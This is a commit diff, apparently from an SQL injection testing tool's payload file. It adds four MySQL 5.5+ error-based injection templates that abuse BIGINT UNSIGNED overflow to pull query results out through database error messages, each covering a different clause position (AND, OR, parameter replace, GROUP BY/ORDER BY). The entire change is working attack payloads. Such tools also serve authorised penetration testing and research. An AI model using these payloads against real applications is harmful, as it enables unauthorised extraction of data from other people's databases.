

Commit b7aeb67

committed
Implementation of a new MySQL error-based payload (found at RDot)
1 parent 8ea22c5 commit b7aeb67

1 file changed

Lines changed: 80 additions & 0 deletions

xml/payloads.xml

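--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1252,6 +1252,26 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
+<stype>2</stype>
+<level>4</level>
+<risk>0</risk>
+<clause>1</clause>
+<where>1</where>
+<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+<request>
+<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.5</dbms_version>
+</details>
+</test>
+
 <test>
 <title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
 <stype>2</stype>
@@ -1470,6 +1490,26 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
+<stype>2</stype>
+<level>5</level>
+<risk>2</risk>
+<clause>1</clause>
+<where>1</where>
+<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+<request>
+<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.5</dbms_version>
+</details>
+</test>
+
 <test>
 <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
 <stype>2</stype>
@@ -1715,6 +1755,26 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
+<stype>2</stype>
+<level>5</level>
+<risk>0</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+<request>
+<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.5</dbms_version>
+</details>
+</test>
+
 <test>
 <title>PostgreSQL error-based - Parameter replace</title>
 <stype>2</stype>
@@ -1877,6 +1937,26 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
+<stype>2</stype>
+<level>5</level>
+<risk>0</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+<request>
+<payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.5</dbms_version>
+</details>
+</test>
+
 <test>
 <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
 <stype>2</stype>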
